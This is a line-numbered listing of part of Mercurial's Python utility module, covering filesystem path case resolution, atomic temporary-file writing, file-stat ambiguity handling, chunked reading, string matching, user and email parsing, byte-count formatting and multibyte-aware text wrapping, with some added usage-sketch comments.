1779 1782 def _makefspathcacheentry(dir):
1780 1783 return dict((normcase(n), n) for n in os.listdir(dir))
1781 1784
1782 1785 seps = pycompat.ossep
1783 1786 if pycompat.osaltsep:
1784 1787 seps = seps + pycompat.osaltsep
1785 1788 # Protect backslashes. This gets silly very quickly.
1786 1789 seps = seps.replace('\\', '\\\\')
1787 1790 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1788 1791 dir = os.path.normpath(root)
1789 1792 result = []
1790 1793 for part, sep in pattern.findall(name):
1791 1794 if sep:
1792 1795 result.append(sep)
1793 1796 continue
1794 1797
1795 1798 if dir not in _fspathcache:
1796 1799 _fspathcache[dir] = _makefspathcacheentry(dir)
1797 1800 contents = _fspathcache[dir]
1798 1801
1799 1802 found = contents.get(part)
1800 1803 if not found:
1801 1804 # retry "once per directory" per "dirstate.walk" which
1802 1805 # may take place for each patch of "hg qpush", for example
1803 1806 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1804 1807 found = contents.get(part)
1805 1808
1806 1809 result.append(found or part)
1807 1810 dir = os.path.join(dir, part)
1808 1811
1809 1812 return ''.join(result)
1810 1813
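# Usage sketch (assumes a case-insensitive filesystem where the
# directory was created as 'Foo/Bar'; both arguments must already be
# normcase-ed):
#
#   fspath(b'foo/bar', b'/repo')    # -> 'Foo/Bar'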
1811 1814 def checknlink(testfile):
1812 1815 '''check whether hardlink count reporting works properly'''
1813 1816
1814 1817 # testfile may be open, so we need a separate file for checking to
1815 1818 # work around issue2543 (or testfile may get lost on Samba shares)
1816 1819 f1, f2, fp = None, None, None
1817 1820 try:
1818 1821 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1819 1822 suffix='1~', dir=os.path.dirname(testfile))
1820 1823 os.close(fd)
1821 1824 f2 = '%s2~' % f1[:-2]
1822 1825
1823 1826 oslink(f1, f2)
1824 1827 # nlinks() may behave differently for files on Windows shares if
1825 1828 # the file is open.
1826 1829 fp = posixfile(f2)
1827 1830 return nlinks(f2) > 1
1828 1831 except OSError:
1829 1832 return False
1830 1833 finally:
1831 1834 if fp is not None:
1832 1835 fp.close()
1833 1836 for f in (f1, f2):
1834 1837 try:
1835 1838 if f is not None:
1836 1839 os.unlink(f)
1837 1840 except OSError:
1838 1841 pass
1839 1842
1840 1843 def endswithsep(path):
1841 1844 '''Check path ends with os.sep or os.altsep.'''
1842 1845 return (path.endswith(pycompat.ossep)
1843 1846 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1844 1847
1845 1848 def splitpath(path):
1846 1849 '''Split path by os.sep.
1847 1850 Note that this function does not use os.altsep because this is
1848 1851 an alternative to a simple "xxx.split(os.sep)".
1849 1852 It is recommended to use os.path.normpath() before using this
1850 1853 function if needed.'''
1851 1854 return path.split(pycompat.ossep)
1852 1855
1853 1856 def gui():
1854 1857 '''Are we running in a GUI?'''
1855 1858 if pycompat.isdarwin:
1856 1859 if 'SSH_CONNECTION' in encoding.environ:
1857 1860 # handle SSH access to a box where the user is logged in
1858 1861 return False
1859 1862 elif getattr(osutil, 'isgui', None):
1860 1863 # check if a CoreGraphics session is available
1861 1864 return osutil.isgui()
1862 1865 else:
1863 1866 # pure build; use a safe default
1864 1867 return True
1865 1868 else:
1866 1869 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1867 1870
1868 1871 def mktempcopy(name, emptyok=False, createmode=None):
1869 1872 """Create a temporary file with the same contents from name
1870 1873
1871 1874 The permission bits are copied from the original file.
1872 1875
1873 1876 If the temporary file is going to be truncated immediately, you
1874 1877 can use emptyok=True as an optimization.
1875 1878
1876 1879 Returns the name of the temporary file.
1877 1880 """
1878 1881 d, fn = os.path.split(name)
1879 1882 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1880 1883 os.close(fd)
1881 1884 # Temporary files are created with mode 0600, which is usually not
1882 1885 # what we want. If the original file already exists, just copy
1883 1886 # its mode. Otherwise, manually obey umask.
1884 1887 copymode(name, temp, createmode)
1885 1888 if emptyok:
1886 1889 return temp
1887 1890 try:
1888 1891 try:
1889 1892 ifp = posixfile(name, "rb")
1890 1893 except IOError as inst:
1891 1894 if inst.errno == errno.ENOENT:
1892 1895 return temp
1893 1896 if not getattr(inst, 'filename', None):
1894 1897 inst.filename = name
1895 1898 raise
1896 1899 ofp = posixfile(temp, "wb")
1897 1900 for chunk in filechunkiter(ifp):
1898 1901 ofp.write(chunk)
1899 1902 ifp.close()
1900 1903 ofp.close()
1901 1904 except: # re-raises
1902 1905 try:
1903 1906 os.unlink(temp)
1904 1907 except OSError:
1905 1908 pass
1906 1909 raise
1907 1910 return temp
1908 1911
1909 1912 class filestat(object):
1910 1913 """help to exactly detect change of a file
1911 1914
1912 1915 'stat' attribute is result of 'os.stat()' if specified 'path'
1913 1916 exists. Otherwise, it is None. This can avoid preparative
1914 1917 'exists()' examination on client side of this class.
1915 1918 """
1916 1919 def __init__(self, stat):
1917 1920 self.stat = stat
1918 1921
1919 1922 @classmethod
1920 1923 def frompath(cls, path):
1921 1924 try:
1922 1925 stat = os.stat(path)
1923 1926 except OSError as err:
1924 1927 if err.errno != errno.ENOENT:
1925 1928 raise
1926 1929 stat = None
1927 1930 return cls(stat)
1928 1931
1929 1932 @classmethod
1930 1933 def fromfp(cls, fp):
1931 1934 stat = os.fstat(fp.fileno())
1932 1935 return cls(stat)
1933 1936
1934 1937 __hash__ = object.__hash__
1935 1938
1936 1939 def __eq__(self, old):
1937 1940 try:
1938 1941 # if ambiguity between stat of new and old file is
1939 1942 # avoided, comparison of size, ctime and mtime is enough
1940 1943 # to exactly detect change of a file regardless of platform
1941 1944 return (self.stat.st_size == old.stat.st_size and
1942 1945 self.stat.st_ctime == old.stat.st_ctime and
1943 1946 self.stat.st_mtime == old.stat.st_mtime)
1944 1947 except AttributeError:
1945 1948 pass
1946 1949 try:
1947 1950 return self.stat is None and old.stat is None
1948 1951 except AttributeError:
1949 1952 return False
1950 1953
1951 1954 def isambig(self, old):
1952 1955 """Examine whether new (= self) stat is ambiguous against old one
1953 1956
1954 1957 "S[N]" below means stat of a file at N-th change:
1955 1958
1956 1959 - S[n-1].ctime < S[n].ctime: can detect change of a file
1957 1960 - S[n-1].ctime == S[n].ctime
1958 1961 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1959 1962 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1960 1963 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1961 1964 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1962 1965
1963 1966 Case (*2) above means that a file was changed twice or more
1964 1967 within the same second (= S[n-1].ctime), and comparison of
1965 1968 timestamps is ambiguous.
1966 1969
1967 1970 The basic idea for avoiding such ambiguity is "advance mtime by
1968 1971 1 sec, if the timestamp is ambiguous".
1969 1972
1970 1973 But advancing mtime only in case (*2) doesn't work as
1971 1974 expected, because naturally advanced S[n].mtime in case (*1)
1972 1975 might be equal to manually advanced S[n-1 or earlier].mtime.
1973 1976
1974 1977 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1975 1978 treated as ambiguous regardless of mtime, to avoid overlooking
1976 1979 conflicts between such mtimes.
1977 1980
1978 1981 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1979 1982 S[n].mtime", even if size of a file isn't changed.
1980 1983 """
1981 1984 try:
1982 1985 return (self.stat.st_ctime == old.stat.st_ctime)
1983 1986 except AttributeError:
1984 1987 return False
1985 1988
1986 1989 def avoidambig(self, path, old):
1987 1990 """Change file stat of specified path to avoid ambiguity
1988 1991
1989 1992 'old' should be previous filestat of 'path'.
1990 1993
1991 1994 Avoiding ambiguity is skipped if the process doesn't have
1992 1995 appropriate privileges for 'path'; this returns False in that
1993 1996 case.
1994 1997
1995 1998 Otherwise, this returns True, as "ambiguity is avoided".
1996 1999 """
1997 2000 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1998 2001 try:
1999 2002 os.utime(path, (advanced, advanced))
2000 2003 except OSError as inst:
2001 2004 if inst.errno == errno.EPERM:
2002 2005 # utime() on the file created by another user causes EPERM,
2003 2006 # if a process doesn't have appropriate privileges
2004 2007 return False
2005 2008 raise
2006 2009 return True
2007 2010
2008 2011 def __ne__(self, other):
2009 2012 return not self == other
2010 2013
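# A sketch of the ambiguity dance described in isambig() above (the
# path and the intervening write are illustrative):
#
#   old = filestat.frompath(path)
#   # ... rewrite path within the same second ...
#   new = filestat.frompath(path)
#   if new.isambig(old):
#       new.avoidambig(path, old)   # advance mtime so readers see a change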
2011 2014 class atomictempfile(object):
2012 2015 '''writable file object that atomically updates a file
2013 2016
2014 2017 All writes will go to a temporary copy of the original file. Call
2015 2018 close() when you are done writing, and atomictempfile will rename
2016 2019 the temporary copy to the original name, making the changes
2017 2020 visible. If the object is destroyed without being closed, all your
2018 2021 writes are discarded.
2019 2022
2020 2023 The checkambig argument of the constructor is used with filestat, and
2021 2024 is useful only if the target file is guarded by a lock (e.g. repo.lock
2022 2025 or repo.wlock).
2023 2026 '''
2024 2027 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2025 2028 self.__name = name # permanent name
2026 2029 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2027 2030 createmode=createmode)
2028 2031 self._fp = posixfile(self._tempname, mode)
2029 2032 self._checkambig = checkambig
2030 2033
2031 2034 # delegated methods
2032 2035 self.read = self._fp.read
2033 2036 self.write = self._fp.write
2034 2037 self.seek = self._fp.seek
2035 2038 self.tell = self._fp.tell
2036 2039 self.fileno = self._fp.fileno
2037 2040
2038 2041 def close(self):
2039 2042 if not self._fp.closed:
2040 2043 self._fp.close()
2041 2044 filename = localpath(self.__name)
2042 2045 oldstat = self._checkambig and filestat.frompath(filename)
2043 2046 if oldstat and oldstat.stat:
2044 2047 rename(self._tempname, filename)
2045 2048 newstat = filestat.frompath(filename)
2046 2049 if newstat.isambig(oldstat):
2047 2050 # stat of changed file is ambiguous to original one
2048 2051 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2049 2052 os.utime(filename, (advanced, advanced))
2050 2053 else:
2051 2054 rename(self._tempname, filename)
2052 2055
2053 2056 def discard(self):
2054 2057 if not self._fp.closed:
2055 2058 try:
2056 2059 os.unlink(self._tempname)
2057 2060 except OSError:
2058 2061 pass
2059 2062 self._fp.close()
2060 2063
2061 2064 def __del__(self):
2062 2065 if safehasattr(self, '_fp'): # constructor actually did something
2063 2066 self.discard()
2064 2067
2065 2068 def __enter__(self):
2066 2069 return self
2067 2070
2068 2071 def __exit__(self, exctype, excvalue, traceback):
2069 2072 if exctype is not None:
2070 2073 self.discard()
2071 2074 else:
2072 2075 self.close()
2073 2076
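# Usage sketch (the filename is illustrative):
#
#   with atomictempfile(b'data.txt') as fp:
#       fp.write(b'all or nothing')
#   # on a clean exit the temporary copy is renamed over 'data.txt';
#   # if an exception escapes the block, the original is left untouched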
2074 2077 def unlinkpath(f, ignoremissing=False):
2075 2078 """unlink and remove the directory if it is empty"""
2076 2079 if ignoremissing:
2077 2080 tryunlink(f)
2078 2081 else:
2079 2082 unlink(f)
2080 2083 # try removing directories that might now be empty
2081 2084 try:
2082 2085 removedirs(os.path.dirname(f))
2083 2086 except OSError:
2084 2087 pass
2085 2088
2086 2089 def tryunlink(f):
2087 2090 """Attempt to remove a file, ignoring ENOENT errors."""
2088 2091 try:
2089 2092 unlink(f)
2090 2093 except OSError as e:
2091 2094 if e.errno != errno.ENOENT:
2092 2095 raise
2093 2096
2094 2097 def makedirs(name, mode=None, notindexed=False):
2095 2098 """recursive directory creation with parent mode inheritance
2096 2099
2097 2100 Newly created directories are marked as "not to be indexed by
2098 2101 the content indexing service", if ``notindexed`` is specified
2099 2102 for "write" mode access.
2100 2103 """
2101 2104 try:
2102 2105 makedir(name, notindexed)
2103 2106 except OSError as err:
2104 2107 if err.errno == errno.EEXIST:
2105 2108 return
2106 2109 if err.errno != errno.ENOENT or not name:
2107 2110 raise
2108 2111 parent = os.path.dirname(os.path.abspath(name))
2109 2112 if parent == name:
2110 2113 raise
2111 2114 makedirs(parent, mode, notindexed)
2112 2115 try:
2113 2116 makedir(name, notindexed)
2114 2117 except OSError as err:
2115 2118 # Catch EEXIST to handle races
2116 2119 if err.errno == errno.EEXIST:
2117 2120 return
2118 2121 raise
2119 2122 if mode is not None:
2120 2123 os.chmod(name, mode)
2121 2124
2122 2125 def readfile(path):
2123 2126 with open(path, 'rb') as fp:
2124 2127 return fp.read()
2125 2128
2126 2129 def writefile(path, text):
2127 2130 with open(path, 'wb') as fp:
2128 2131 fp.write(text)
2129 2132
2130 2133 def appendfile(path, text):
2131 2134 with open(path, 'ab') as fp:
2132 2135 fp.write(text)
2133 2136
2134 2137 class chunkbuffer(object):
2135 2138 """Allow arbitrary sized chunks of data to be efficiently read from an
2136 2139 iterator over chunks of arbitrary size."""
2137 2140
2138 2141 def __init__(self, in_iter):
2139 2142 """in_iter is the iterator that's iterating over the input chunks."""
2140 2143 def splitbig(chunks):
2141 2144 for chunk in chunks:
2142 2145 if len(chunk) > 2**20:
2143 2146 pos = 0
2144 2147 while pos < len(chunk):
2145 2148 end = pos + 2 ** 18
2146 2149 yield chunk[pos:end]
2147 2150 pos = end
2148 2151 else:
2149 2152 yield chunk
2150 2153 self.iter = splitbig(in_iter)
2151 2154 self._queue = collections.deque()
2152 2155 self._chunkoffset = 0
2153 2156
2154 2157 def read(self, l=None):
2155 2158 """Read L bytes of data from the iterator of chunks of data.
2156 2159 Returns less than L bytes if the iterator runs dry.
2157 2160
2158 2161 If size parameter is omitted, read everything"""
2159 2162 if l is None:
2160 2163 return ''.join(self.iter)
2161 2164
2162 2165 left = l
2163 2166 buf = []
2164 2167 queue = self._queue
2165 2168 while left > 0:
2166 2169 # refill the queue
2167 2170 if not queue:
2168 2171 target = 2**18
2169 2172 for chunk in self.iter:
2170 2173 queue.append(chunk)
2171 2174 target -= len(chunk)
2172 2175 if target <= 0:
2173 2176 break
2174 2177 if not queue:
2175 2178 break
2176 2179
2177 2180 # The easy way to do this would be to queue.popleft(), modify the
2178 2181 # chunk (if necessary), then queue.appendleft(). However, for cases
2179 2182 # where we read partial chunk content, this incurs 2 dequeue
2180 2183 # mutations and creates a new str for the remaining chunk in the
2181 2184 # queue. Our code below avoids this overhead.
2182 2185
2183 2186 chunk = queue[0]
2184 2187 chunkl = len(chunk)
2185 2188 offset = self._chunkoffset
2186 2189
2187 2190 # Use full chunk.
2188 2191 if offset == 0 and left >= chunkl:
2189 2192 left -= chunkl
2190 2193 queue.popleft()
2191 2194 buf.append(chunk)
2192 2195 # self._chunkoffset remains at 0.
2193 2196 continue
2194 2197
2195 2198 chunkremaining = chunkl - offset
2196 2199
2197 2200 # Use all of unconsumed part of chunk.
2198 2201 if left >= chunkremaining:
2199 2202 left -= chunkremaining
2200 2203 queue.popleft()
2201 2204 # the offset == 0 case is handled by the block above, so this
2202 2205 # won't merely copy the whole chunk via ``chunk[0:]``.
2203 2206 buf.append(chunk[offset:])
2204 2207 self._chunkoffset = 0
2205 2208
2206 2209 # Partial chunk needed.
2207 2210 else:
2208 2211 buf.append(chunk[offset:offset + left])
2209 2212 self._chunkoffset += left
2210 2213 left -= chunkremaining
2211 2214
2212 2215 return ''.join(buf)
2213 2216
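# For example, reads are stitched together across chunk boundaries:
#
#   >>> cb = chunkbuffer(iter([b'ab', b'cd', b'ef']))
#   >>> cb.read(3)
#   'abc'
#   >>> cb.read(3)
#   'def'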
2214 2217 def filechunkiter(f, size=131072, limit=None):
2215 2218 """Create a generator that produces the data in the file size
2216 2219 (default 131072) bytes at a time, up to optional limit (default is
2217 2220 to read all data). Chunks may be less than size bytes if the
2218 2221 chunk is the last chunk in the file, or the file is a socket or
2219 2222 some other type of file that sometimes reads less data than is
2220 2223 requested."""
2221 2224 assert size >= 0
2222 2225 assert limit is None or limit >= 0
2223 2226 while True:
2224 2227 if limit is None:
2225 2228 nbytes = size
2226 2229 else:
2227 2230 nbytes = min(limit, size)
2228 2231 s = nbytes and f.read(nbytes)
2229 2232 if not s:
2230 2233 break
2231 2234 if limit:
2232 2235 limit -= len(s)
2233 2236 yield s
2234 2237
2235 2238 class cappedreader(object):
2236 2239 """A file object proxy that allows reading up to N bytes.
2237 2240
2238 2241 Given a source file object, instances of this type allow reading up to
2239 2242 N bytes from that source file object. Attempts to read past the allowed
2240 2243 limit are treated as EOF.
2241 2244
2242 2245 It is assumed that I/O is not performed on the original file object
2243 2246 in addition to I/O that is performed by this instance. If there is,
2244 2247 state tracking will get out of sync and unexpected results will ensue.
2245 2248 """
2246 2249 def __init__(self, fh, limit):
2247 2250 """Allow reading up to <limit> bytes from <fh>."""
2248 2251 self._fh = fh
2249 2252 self._left = limit
2250 2253
2251 2254 def read(self, n=-1):
2252 2255 if not self._left:
2253 2256 return b''
2254 2257
2255 2258 if n < 0:
2256 2259 n = self._left
2257 2260
2258 2261 data = self._fh.read(min(n, self._left))
2259 2262 self._left -= len(data)
2260 2263 assert self._left >= 0
2261 2264
2262 2265 return data
2263 2266
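# For example, reads stop at the cap even if the source has more data:
#
#   >>> r = cappedreader(stringio(b'abcdef'), 4)
#   >>> r.read()
#   'abcd'
#   >>> r.read()
#   ''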
2264 2267 def stringmatcher(pattern, casesensitive=True):
2265 2268 """
2266 2269 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2267 2270 returns the matcher name, pattern, and matcher function.
2268 2271 missing or unknown prefixes are treated as literal matches.
2269 2272
2270 2273 helper for tests:
2271 2274 >>> def test(pattern, *tests):
2272 2275 ... kind, pattern, matcher = stringmatcher(pattern)
2273 2276 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2274 2277 >>> def itest(pattern, *tests):
2275 2278 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2276 2279 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2277 2280
2278 2281 exact matching (no prefix):
2279 2282 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2280 2283 ('literal', 'abcdefg', [False, False, True])
2281 2284
2282 2285 regex matching ('re:' prefix)
2283 2286 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2284 2287 ('re', 'a.+b', [False, False, True])
2285 2288
2286 2289 force exact matches ('literal:' prefix)
2287 2290 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2288 2291 ('literal', 're:foobar', [False, True])
2289 2292
2290 2293 unknown prefixes are ignored and treated as literals
2291 2294 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2292 2295 ('literal', 'foo:bar', [False, False, True])
2293 2296
2294 2297 case insensitive regex matches
2295 2298 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2296 2299 ('re', 'A.+b', [False, False, True])
2297 2300
2298 2301 case insensitive literal matches
2299 2302 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2300 2303 ('literal', 'ABCDEFG', [False, False, True])
2301 2304 """
2302 2305 if pattern.startswith('re:'):
2303 2306 pattern = pattern[3:]
2304 2307 try:
2305 2308 flags = 0
2306 2309 if not casesensitive:
2307 2310 flags = remod.I
2308 2311 regex = remod.compile(pattern, flags)
2309 2312 except remod.error as e:
2310 2313 raise error.ParseError(_('invalid regular expression: %s')
2311 2314 % e)
2312 2315 return 're', pattern, regex.search
2313 2316 elif pattern.startswith('literal:'):
2314 2317 pattern = pattern[8:]
2315 2318
2316 2319 match = pattern.__eq__
2317 2320
2318 2321 if not casesensitive:
2319 2322 ipat = encoding.lower(pattern)
2320 2323 match = lambda s: ipat == encoding.lower(s)
2321 2324 return 'literal', pattern, match
2322 2325
2323 2326 def shortuser(user):
2324 2327 """Return a short representation of a user name or email address."""
2325 2328 f = user.find('@')
2326 2329 if f >= 0:
2327 2330 user = user[:f]
2328 2331 f = user.find('<')
2329 2332 if f >= 0:
2330 2333 user = user[f + 1:]
2331 2334 f = user.find(' ')
2332 2335 if f >= 0:
2333 2336 user = user[:f]
2334 2337 f = user.find('.')
2335 2338 if f >= 0:
2336 2339 user = user[:f]
2337 2340 return user
2338 2341
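# For example:
#
#   >>> shortuser(b'John Doe <john.doe@example.com>')
#   'john'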
2339 2342 def emailuser(user):
2340 2343 """Return the user portion of an email address."""
2341 2344 f = user.find('@')
2342 2345 if f >= 0:
2343 2346 user = user[:f]
2344 2347 f = user.find('<')
2345 2348 if f >= 0:
2346 2349 user = user[f + 1:]
2347 2350 return user
2348 2351
2349 2352 def email(author):
2350 2353 '''get email of author.'''
2351 2354 r = author.find('>')
2352 2355 if r == -1:
2353 2356 r = None
2354 2357 return author[author.find('<') + 1:r]
2355 2358
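# For example:
#
#   >>> emailuser(b'John Doe <john@example.com>')
#   'john'
#   >>> email(b'John Doe <john@example.com>')
#   'john@example.com'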
2356 2359 def ellipsis(text, maxlength=400):
2357 2360 """Trim string to at most maxlength (default: 400) columns in display."""
2358 2361 return encoding.trim(text, maxlength, ellipsis='...')
2359 2362
2360 2363 def unitcountfn(*unittable):
2361 2364 '''return a function that renders a readable count of some quantity'''
2362 2365
2363 2366 def go(count):
2364 2367 for multiplier, divisor, format in unittable:
2365 2368 if abs(count) >= divisor * multiplier:
2366 2369 return format % (count / float(divisor))
2367 2370 return unittable[-1][2] % count
2368 2371
2369 2372 return go
2370 2373
2371 2374 def processlinerange(fromline, toline):
2372 2375 """Check that linerange <fromline>:<toline> makes sense and return a
2373 2376 0-based range.
2374 2377
2375 2378 >>> processlinerange(10, 20)
2376 2379 (9, 20)
2377 2380 >>> processlinerange(2, 1)
2378 2381 Traceback (most recent call last):
2379 2382 ...
2380 2383 ParseError: line range must be positive
2381 2384 >>> processlinerange(0, 5)
2382 2385 Traceback (most recent call last):
2383 2386 ...
2384 2387 ParseError: fromline must be strictly positive
2385 2388 """
2386 2389 if toline - fromline < 0:
2387 2390 raise error.ParseError(_("line range must be positive"))
2388 2391 if fromline < 1:
2389 2392 raise error.ParseError(_("fromline must be strictly positive"))
2390 2393 return fromline - 1, toline
2391 2394
2392 2395 bytecount = unitcountfn(
2393 2396 (100, 1 << 30, _('%.0f GB')),
2394 2397 (10, 1 << 30, _('%.1f GB')),
2395 2398 (1, 1 << 30, _('%.2f GB')),
2396 2399 (100, 1 << 20, _('%.0f MB')),
2397 2400 (10, 1 << 20, _('%.1f MB')),
2398 2401 (1, 1 << 20, _('%.2f MB')),
2399 2402 (100, 1 << 10, _('%.0f KB')),
2400 2403 (10, 1 << 10, _('%.1f KB')),
2401 2404 (1, 1 << 10, _('%.2f KB')),
2402 2405 (1, 1, _('%.0f bytes')),
2403 2406 )
2404 2407
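# For example (assuming the default untranslated locale):
#
#   >>> bytecount(100)
#   '100 bytes'
#   >>> bytecount(1048576)
#   '1.00 MB'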
2405 2408 # Matches a single EOL, which can be either a CRLF (where repeated CRs
2406 2409 # are removed) or a LF. We do not care about old Macintosh files, so a
2407 2410 # stray CR is an error.
2408 2411 _eolre = remod.compile(br'\r*\n')
2409 2412
2410 2413 def tolf(s):
2411 2414 return _eolre.sub('\n', s)
2412 2415
2413 2416 def tocrlf(s):
2414 2417 return _eolre.sub('\r\n', s)
2415 2418
2416 2419 if pycompat.oslinesep == '\r\n':
2417 2420 tonativeeol = tocrlf
2418 2421 fromnativeeol = tolf
2419 2422 else:
2420 2423 tonativeeol = pycompat.identity
2421 2424 fromnativeeol = pycompat.identity
2422 2425
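# For example:
#
#   >>> tolf(b'a\r\nb\n')
#   'a\nb\n'
#   >>> tocrlf(b'a\nb\n')
#   'a\r\nb\r\n'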
2423 2426 def escapestr(s):
2424 2427 # call underlying function of s.encode('string_escape') directly for
2425 2428 # Python 3 compatibility
2426 2429 return codecs.escape_encode(s)[0]
2427 2430
2428 2431 def unescapestr(s):
2429 2432 return codecs.escape_decode(s)[0]
2430 2433
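# For example, the two functions round-trip:
#
#   >>> escapestr(b'\x00ab\n')
#   '\\x00ab\\n'
#   >>> unescapestr(b'\\x00ab\\n')
#   '\x00ab\n'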
2431 2434 def forcebytestr(obj):
2432 2435 """Portably format an arbitrary object (e.g. exception) into a byte
2433 2436 string."""
2434 2437 try:
2435 2438 return pycompat.bytestr(obj)
2436 2439 except UnicodeEncodeError:
2437 2440 # non-ascii string, may be lossy
2438 2441 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2439 2442
2440 2443 def uirepr(s):
2441 2444 # Avoid double backslash in Windows path repr()
2442 2445 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2443 2446
2444 2447 # delay import of textwrap
2445 2448 def MBTextWrapper(**kwargs):
2446 2449 class tw(textwrap.TextWrapper):
2447 2450 """
2448 2451 Extend TextWrapper for width-awareness.
2449 2452
2450 2453 Neither the number of 'bytes' in any encoding nor the number of
2451 2454 'characters' is appropriate for computing the terminal columns of a string.
2452 2455
2453 2456 Original TextWrapper implementation uses built-in 'len()' directly,
2454 2457 so overriding is needed to use the width information of each character.
2455 2458
2456 2459 In addition, characters classified as 'ambiguous' width are
2457 2460 treated as wide in East Asian locales, but as narrow in others.
2458 2461 
2459 2462 This requires a per-use decision to determine the width of such characters.
2460 2463 """
2461 2464 def _cutdown(self, ucstr, space_left):
2462 2465 l = 0
2463 2466 colwidth = encoding.ucolwidth
2464 2467 for i in xrange(len(ucstr)):
2465 2468 l += colwidth(ucstr[i])
2466 2469 if space_left < l:
2467 2470 return (ucstr[:i], ucstr[i:])
2468 2471 return ucstr, ''
2469 2472
2470 2473 # overriding of base class
2471 2474 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2472 2475 space_left = max(width - cur_len, 1)
2473 2476
2474 2477 if self.break_long_words:
2475 2478 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2476 2479 cur_line.append(cut)
2477 2480 reversed_chunks[-1] = res
2478 2481 elif not cur_line:
2479 2482 cur_line.append(reversed_chunks.pop())
2480 2483
2481 2484 # this overriding code is imported from TextWrapper of Python 2.6
2482 2485 # to calculate columns of string by 'encoding.ucolwidth()'
2483 2486 def _wrap_chunks(self, chunks):
2484 2487 colwidth = encoding.ucolwidth
2485 2488
2486 2489 lines = []
2487 2490 if self.width <= 0:
2488 2491 raise ValueError("invalid width %r (must be > 0)" % self.width)
2489 2492
2490 2493 # Arrange in reverse order so items can be efficiently popped
2491 2494 # from a stack of chunks.
2492 2495 chunks.reverse()
2493 2496
2494 2497 while chunks:
2495 2498
2496 2499 # Start the list of chunks that will make up the current line.
2497 2500 # cur_len is just the length of all the chunks in cur_line.
2498 2501 cur_line = []
2499 2502 cur_len = 0
2500 2503
2501 2504 # Figure out which static string will prefix this line.
2502 2505 if lines:
2503 2506 indent = self.subsequent_indent
2504 2507 else:
2505 2508 indent = self.initial_indent
2506 2509
2507 2510 # Maximum width for this line.
2508 2511 width = self.width - len(indent)
2509 2512
2510 2513 # First chunk on line is whitespace -- drop it, unless this
2511 2514 # is the very beginning of the text (i.e. no lines started yet).
2512 2515 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2513 2516 del chunks[-1]
2514 2517
2515 2518 while chunks:
2516 2519 l = colwidth(chunks[-1])
2517 2520
2518 2521 # Can at least squeeze this chunk onto the current line.
2519 2522 if cur_len + l <= width:
2520 2523 cur_line.append(chunks.pop())
2521 2524 cur_len += l
2522 2525
2523 2526 # Nope, this line is full.
2524 2527 else:
2525 2528 break
2526 2529
2527 2530 # The current line is full, and the next chunk is too big to
2528 2531 # fit on *any* line (not just this one).
2529 2532 if chunks and colwidth(chunks[-1]) > width:
2530 2533 self._handle_long_word(chunks, cur_line, cur_len, width)
2531 2534
2532 2535 # If the last chunk on this line is all whitespace, drop it.
2533 2536 if (self.drop_whitespace and
2534 2537 cur_line and cur_line[-1].strip() == r''):
2535 2538 del cur_line[-1]
2536 2539
2537 2540 # Convert current line back to a string and store it in list
2538 2541 # of all lines (return value).
2539 2542 if cur_line:
2540 2543 lines.append(indent + r''.join(cur_line))
2541 2544
2542 2545 return lines
2543 2546
2544 2547 global MBTextWrapper
2545 2548 MBTextWrapper = tw
2546 2549 return tw(**kwargs)
2547 2550
2548 2551 def wrap(line, width, initindent='', hangindent=''):
2549 2552 maxindent = max(len(hangindent), len(initindent))
2550 2553 if width <= maxindent:
2551 2554 # adjust for weird terminal size
2552 2555 width = max(78, maxindent + 1)
2553 2556 line = line.decode(pycompat.sysstr(encoding.encoding),
2554 2557 pycompat.sysstr(encoding.encodingmode))
2555 2558 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2556 2559 pycompat.sysstr(encoding.encodingmode))
2557 2560 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2558 2561 pycompat.sysstr(encoding.encodingmode))
2559 2562 wrapper = MBTextWrapper(width=width,
2560 2563 initial_indent=initindent,
2561 2564 subsequent_indent=hangindent)
2562 2565 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2563 2566
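# For example (with plain ASCII input, where column width equals length):
#
#   >>> wrap(b'aaa bbb ccc', 7)
#   'aaa bbb\nccc'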
2564 2567 if (pyplatform.python_implementation() == 'CPython' and
2565 2568 sys.version_info < (3, 0)):
2566 2569 # There is an issue in CPython that some IO methods do not handle EINTR
2567 2570 # correctly. The following table shows what CPython version (and functions)
2568 2571 # are affected (buggy: has the EINTR bug, okay: otherwise):
2569 2572 #
2570 2573 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2571 2574 # --------------------------------------------------
2572 2575 # fp.__iter__ | buggy | buggy | okay
2573 2576 # fp.read* | buggy | okay [1] | okay
2574 2577 #
2575 2578 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2576 2579 #
2577 2580 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2578 2581 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
